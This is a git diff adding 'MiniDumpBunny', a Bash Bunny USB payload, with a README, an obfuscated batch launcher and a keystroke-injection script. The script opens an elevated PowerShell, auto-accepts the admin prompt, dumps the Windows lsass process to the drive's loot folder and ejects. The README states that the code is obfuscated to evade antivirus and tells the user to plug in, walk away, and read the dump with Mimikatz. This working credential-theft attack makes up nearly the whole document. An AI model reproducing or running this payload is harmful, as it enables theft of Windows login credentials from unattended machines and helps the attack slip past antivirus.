diff --git a/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat b/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat
new file mode 100644
index 00000000..7e6ea1d9
--- /dev/null
+++ b/payloads/library/credentials/MiniDumpBunny/MiniBunny.bat
@@ -0,0 +1,2 @@
+ÿþ&cls
+powershell.exe -enc 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
\ No newline at end of file
diff --git a/payloads/library/credentials/MiniDumpBunny/README.md b/payloads/library/credentials/MiniDumpBunny/README.md
new file mode 100644
index 00000000..a6fba8e0
--- /dev/null
+++ b/payloads/library/credentials/MiniDumpBunny/README.md
@@ -0,0 +1,17 @@
+**Title: MiniDumpBunny**
+
+Author: 0iphor13
+
+Version: 1.0
+
+What is MiniDumpBunny?
+#
+*MiniDumpBunny uses Powersploits Out-MiniDump script to dump lsass. The script was rewritten, adapted for BashBunny usage and obfuscated in multiple ways to evade Antivirus.*
+#
+
+**Instruction:**
+
+Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
+#
+Exfiltrate the .dmp file and read it with Mimikatz.
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
\ No newline at end of file
diff --git a/payloads/library/credentials/MiniDumpBunny/mimi.png b/payloads/library/credentials/MiniDumpBunny/mimi.png
new file mode 100644
index 00000000..e366dd64
Binary files /dev/null and b/payloads/library/credentials/MiniDumpBunny/mimi.png differ
diff --git a/payloads/library/credentials/MiniDumpBunny/payload.txt b/payloads/library/credentials/MiniDumpBunny/payload.txt
new file mode 100644
index 00000000..2fc58a03
--- /dev/null
+++ b/payloads/library/credentials/MiniDumpBunny/payload.txt
@@ -0,0 +1,43 @@
+#!/bin/bash
+#
+# Title: MiniDumpBunny
+# Description: Dump lsass with this script, which was obfuscated with multiple layers.
+# Author: 0iphor13
+# Version: 1.0
+# Category: Credentials
+# Attackmodes: HID, Storage
+
+LED SETUP
+
+Q DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+Q DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+Q DELAY 1000
+RUN WIN "powershell Start-Process powershell -Verb runAs"
+Q ENTER
+Q DELAY 1000
+Q ALT j
+Q DELAY 250
+
+Q DELAY 250
+Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\MiniBunny.bat')"
+Q DELAY 250
+Q STRING " ;mv *.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
+Q DELAY 250
+Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
+Q DELAY 250
+Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
+Q DELAY 300
+Q ENTER
+
+LED FINISH
\ No newline at end of file